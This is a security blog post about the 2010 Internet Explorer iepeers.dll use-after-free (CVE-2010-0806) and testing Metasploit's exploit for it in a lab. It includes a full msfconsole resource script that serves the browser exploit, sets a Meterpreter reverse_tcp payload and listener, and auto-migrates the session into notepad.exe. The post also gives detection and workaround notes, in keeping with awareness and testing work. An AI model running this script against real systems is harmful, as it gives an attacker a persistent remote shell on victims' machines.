Catch²² (in)security / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: cve-2010-0806

Internet Explorer iepeers.dll use-after-free

A few days ago (9 March 2010), Microsoft confirmed an as-yet-unpatched vulnerability in Internet Explorer 6 and 7 (Security Advisory 981374). McAfee also released details of targeted attacks discovered in the wild that actively use this vulnerability. Since then, full information about the vulnerability and proof-of-concept code have been released publicly. As usual, the great guys behind Metasploit have a working exploit, courtesy of Trancer at http://www.rec-sec.com.

After fighting with my VMware install under Ubuntu 10.04 (yes, I know… it's an alpha, why is that on your main box!!!) last night after the release, I finally got a chance to play a little with the exploit today in a test environment. As you can imagine, the exploit is simple to use and works like a charm (at least in the testing I've done). I've put together a quick video of the exploit for those who want to show their management types why this is such a serious issue.

I particularly like that the exploit runs migrate -f automatically (see 'show advanced', where it is set as the initial auto-run script). This spawns a new notepad.exe process and migrates the Meterpreter session into it, so that if the victim closes or kills IE, the session isn't killed along with the browser process. You learn something new every day!
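For anyone reproducing this in a lab, the msfconsole resource script below is an added example of the setup described above; it is not from the original post, from Trancer or from the Metasploit project. The module name exploit/windows/browser/ie_iepeers_pointer, the payload, the listener address 192.168.56.1 and the URI path are assumptions for a private test network, so check them against `search iepeers` and `show options` in your own Metasploit install before use.

```text
# lab.rc - assumed msfconsole resource script (example, not from the post)
# Run with: msfconsole -r lab.rc
use exploit/windows/browser/ie_iepeers_pointer   # assumed module name; confirm with 'search iepeers'
set SRVHOST 192.168.56.1       # assumed host-only lab interface serving the malicious page
set SRVPORT 8080
set URIPATH /                  # assumed; victim IE 6/7 browses to http://192.168.56.1:8080/
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1         # assumed listener address for the reverse shell
set LPORT 4444
# The advanced option the post refers to: once Meterpreter lands in iexplore.exe
# it immediately spawns notepad.exe and migrates into it, so closing IE does not
# take the session with it. Shown here explicitly; the module already defaults to it.
set InitialAutoRunScript migrate -f
exploit -j                     # run as a background job and wait for the browser to connect
```

Because the session migrates out of iexplore.exe, an incident responder reviewing the victim cannot rely on the browser process list alone; an unexpected notepad.exe with a network connection is the artefact to look for.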

Microsoft has now posted a number of workarounds (mostly centred on disabling or limiting access to the Peer Factory class in iepeers.dll). These reduce exposure but don't remove the bug, so they are a stop-gap until the IE update ships. For more information, check out KB981374 and CVE-2010-0806.

All credit for the exploit goes to Trancer, and all credit to HD Moore and the Metasploit team for producing such a great tool for people like me (another tool) to rely on so much.

Keep up the good work.